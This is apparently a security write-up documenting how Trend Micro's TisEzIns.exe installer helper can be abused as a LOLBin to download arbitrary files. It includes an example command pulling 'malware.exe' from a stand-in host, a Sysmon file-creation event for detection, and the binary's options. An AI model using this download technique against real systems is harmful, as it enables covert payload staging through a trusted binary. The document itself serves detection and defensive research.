Summary#

The TisEzIns binary bundled with TrendMicro installer and used by it to download the latest version of TrendMicro can be abused to download arbitrary file.

The binary contains the following description: Helps download the Trend Micro software installer

Example#

TisEzIns.exe /b /u "http://10.10.1.10/malware.exe" /f "C:\path\to\save\malware.exe"

Generated event

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
  <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" /> 
  <EventID>11</EventID> 
  <Version>2</Version> 
  <Level>4</Level> 
  <Task>11</Task> 
  <Opcode>0</Opcode> 
  <Keywords>0x8000000000000000</Keywords> 
  <TimeCreated SystemTime="2023-05-11 17:31:30.0297853Z" /> 
  <EventRecordID>1721279854</EventRecordID> 
  <Correlation /> 
  <Execution ProcessID="6488" ThreadID="8544" /> 
  <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
  <Computer>XXXXX</Computer> 
  <Security UserID="S-1-5-18" /> 
  </System>
- <EventData>
  <Data Name="RuleName">-</Data> 
  <Data Name="UtcTime">2023-05-11 17:31:30.029</Data> 
  <Data Name="ProcessGuid">{9a08371b-9561-6476-3d05-030000002800}</Data> 
  <Data Name="ProcessId">36616</Data> 
  <Data Name="Image">C:\LabStuff\TrendMicro-LOLBIN\Vizor32\TisEzIns.exe</Data> 
  <Data Name="TargetFilename">C:\path\to\save\malware.exe</Data> 
  <Data Name="CreationUtcTime">2023-05-11 17:31:30.029</Data> 
  <Data Name="User">XXXXX</Data> 
  </EventData>
  </Event>

Command-Line Options#

IPC:
    -a <agent>,    Specify the user agent used in the HTTP protocol
    -w <event>,    Wait for an windows event
    -p <event>,    Paule an windows event
FileName:
    -f <path>,     The full path of downloaded file. Use CWD + original file name if no specification
URL:
    -u <url>,      The target file location
Options:
    -e <epid>,     Register event callback
    -m <value>,    MD5 value
    -v <log_type>, Verbose Mode
    -h,            Display usage
    -c,            Continue previous downloading
    -b,            Run downloaded in background

For reference, a legitimate CLI would look something like this:

"C:\ProgramData\Trend Micro Installer\TrendMicro_XX.X_HE_Full_XXXXXX\Vizor32\TisEzIns.exe" /v XXXX /b /e XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /u "https://files.trendmicro.com/products/XXXXXXX/XX.X_XXXX/Global/XXXXXXXX/TrendMicro_XX.X_XXXX_HE_64bit.exe" /c /m XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX /p TREND_VIZOR_GLOBAL_EVENT_CONNECTION_ESTABLISHED /w TREND_VIZOR_GLOBAL_EVENT_SIA_DOWNLOAD_NOW /a XXXXXXXXXXX /f "C:\WINDOWS\temp\trend download\TrendMicro_Download.exe"

Related Articles

Other threads in the archive worth reading next.

Living off the Land

Living of the Land - DISM Sandbox Provider Hijack

A look at how DISM's sandbox path can be combined with the provider loader to redirect provider DLL loading from a copied DISM directory.

Living off the Land

Living of the Land - AgentExecutor

Detailed analysis of the AgentExecutor binary, its execution paths, and how it can be leveraged for code execution. Based on version 1.80.133.0 and Microsoft.Management.Clients.IntuneManagementExtension.WinGetLibrary.dll version 1.79.160.0.

Living off the Land

Living of the Land - Datacollector.EXE

Deep dive into the Datacollector.exe utility, its functionality, and how it can be used as a Living off the Land Binary (LOLBin) for proxy execution.